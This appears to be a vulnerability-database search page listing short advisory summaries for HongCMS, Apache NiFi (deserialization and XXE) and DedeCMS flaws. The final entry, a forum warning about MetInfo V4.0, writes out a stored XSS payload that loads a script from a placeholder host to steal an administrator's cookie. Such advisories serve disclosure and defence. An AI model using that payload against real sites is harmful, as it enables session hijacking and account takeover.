68 matches found
CVE-2018-13021
An issue was discovered in HongCMS 3.0.0. There is an Arbitrary Script File Upload issue that can result in PHP code execution via the admin/index.php/template/upload URI...
Java Deserialization
nifi-framework-core is vulnerable to Java deserialization. An authenticated user who has a valid client certificate can upload a template containing malicious code to cause a denial of service DoS conditions and potentially perform other attacks...
CVE-2017-15703
Any authenticated user valid client certificate but without ACL permissions could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users...
CVE-2017-15703
Any authenticated user valid client certificate but without ACL permissions could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users...
CVE-2017-15703
Any authenticated user valid client certificate but without ACL permissions could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users...
Desdev DedeCMS Arbitrary File Upload Vulnerability
Desdev DedeCMS Dream Weaving Content Management System is China's Zhuozhuo network Desdev Technology Co., Ltd. of a set of open-source set of content publishing, editing, management and retrieval is equal to one of the PHP Web site content management system CMS. A security vulnerability exists in...
Apache NiFi XML External Entity Injection Vulnerability
Apache NiFi is a system for processing and distributing data. Apache NiFi versions 1.0.0 through 1.3.0 suffer from an XML external entity injection vulnerability in the implementation, which allows an attacker to upload templates containing malicious code and access sensitive files via an XXE...
The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net
Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...